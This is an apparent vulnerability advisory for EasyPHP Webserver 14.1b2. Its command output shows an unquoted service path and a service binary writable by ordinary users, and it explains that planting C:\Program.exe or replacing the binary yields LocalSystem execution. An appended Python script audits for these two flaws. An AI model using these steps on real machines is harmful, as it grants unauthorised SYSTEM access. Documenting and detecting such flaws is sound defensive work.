EasyPHP Webserver 14.1b2 Privilege Escalation
Posted on 21 January 2017
# Exploit Title: [EasyPHP-Webserver Service - Privilege Escalation]
# Date: [date]
# Exploit Author: [Owais Mehtab, Tayeeb Rana]
# Vendor Homepage: [www.easyphp.org/]
# Software Link: [http://www.easyphp.org/easyphp-webserver.php]
# Version: [14.1b2]
# Tested on: [Win7 Sp1]

C:\Program Files (x86)\EasyPHP-Webserver-14.1b2\binaries\httpserver\bin>icacls ews-httpd.exe
ews-httpd.exe BUILTIN\Users:(I)(M)<---
              NT AUTHORITY\SYSTEM:(I)(F)
              BUILTIN\Administrators:(I)(F)

C:\>sc qc ews-httpserver
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ews-httpserver
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\EasyPHP-Webserver-14.1b2\binaries\httpserver\bin\ews-httpd.exe -k runservice
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ews-httpserver
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

An attacker may put a binary in the following location to run it as the LocalSystem account:

C:\Program.exe

Or overwrite the binary and restart the service.
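A defender-side check for the two conditions visible in the output above, an unquoted service path containing spaces and a service binary that BUILTIN\Users can modify. This is an added example, not part of the original advisory: the function names and the `LOW_PRIV` list are this example's own assumptions, and the sample input is constructed from the quoted output with path separators restored.

```python
import re

# Constructed sample input: the command output quoted in the advisory,
# with path separators restored.
SC_QC = r"""SERVICE_NAME: ews-httpserver
        BINARY_PATH_NAME   : C:\Program Files (x86)\EasyPHP-Webserver-14.1b2\binaries\httpserver\bin\ews-httpd.exe -k runservice
        SERVICE_START_NAME : LocalSystem"""
ICACLS = r"""ews-httpd.exe BUILTIN\Users:(I)(M)
              NT AUTHORITY\SYSTEM:(I)(F)
              BUILTIN\Administrators:(I)(F)"""

# Assumption: principals this audit treats as ordinary, non-admin users.
LOW_PRIV = (r"BUILTIN\Users", r"Everyone", r"NT AUTHORITY\Authenticated Users")
WRITE_RIGHTS = {"F", "M", "W"}  # icacls letters: full control, modify, write


def binary_path(sc_qc_output):
    """Return the BINARY_PATH_NAME value from `sc qc` output, or None."""
    m = re.search(r"BINARY_PATH_NAME\s*:\s*(.+)", sc_qc_output)
    return m.group(1).strip() if m else None


def is_unquoted_with_spaces(path):
    """True when the executable part is not quoted and contains a space."""
    if path.startswith('"'):
        return False
    m = re.match(r"(.+?\.exe)\b", path, re.IGNORECASE)
    return " " in (m.group(1) if m else path)


def writable_by_low_priv(icacls_output):
    """Return low-privileged principals holding an allow ACE with F, M or W."""
    hits = []
    for who in LOW_PRIV:
        for m in re.finditer(re.escape(who) + r":((?:\([A-Z,]+\))+)", icacls_output):
            tokens = set(re.findall(r"[A-Z]+", m.group(1)))
            if "DENY" not in tokens and tokens & WRITE_RIGHTS and who not in hits:
                hits.append(who)
    return hits


def audit(sc_qc_output, icacls_output):
    """Combine both checks into a list of findings for one service."""
    findings = []
    path = binary_path(sc_qc_output)
    if path and is_unquoted_with_spaces(path):
        findings.append("unquoted service path with spaces")
    findings += [f"service binary writable by {w}" for w in writable_by_low_priv(icacls_output)]
    return findings
```

An empty list from `audit` means the image path is quoted and no listed low-privileged principal holds a write-capable ACE on the binary.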